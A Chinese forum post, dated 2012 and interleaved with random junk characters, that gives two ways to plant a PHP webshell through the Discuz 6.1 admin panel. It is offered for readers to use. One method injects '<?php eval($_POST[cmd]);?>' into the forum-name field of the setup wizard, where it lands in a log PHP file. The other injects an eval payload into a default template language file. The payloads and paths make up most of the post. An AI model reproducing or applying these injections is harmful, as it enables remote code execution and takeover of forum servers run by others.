discuz6.1两种方法后台拿shell
, ]' A9 g; J' m e [7 A好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下+ Y- Q2 _8 [. ^. }) w: e0 ^
1:) u/ i( I) l2 h" S! a: K" l
http://127.0.0.1/discuz/admincp. ... zard&frames=yes3 o" ]5 F6 h# o8 g \/ ` j! S4 i
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell- P6 n3 U) E/ c
<?php eval($_POST[cmd]);?>/ h+ Q* V' U; Z$ M
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php* W: w0 p* H9 j6 G }7 |: h
# A& ^6 j0 z7 L9 K; J+ V5 X
, D- H: B" ~( I! j2:后台模板管理--默认模板套系--详情; a# r; y/ N% ^% l
templates/default/actions.lang.php7 B. K- H% X6 |# v$ W
jhackj\\');eval($_POST[cmd])?>;//
9 D% u" q: J8 [& n& M
+ @; O$ u8 C$ a1 }利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对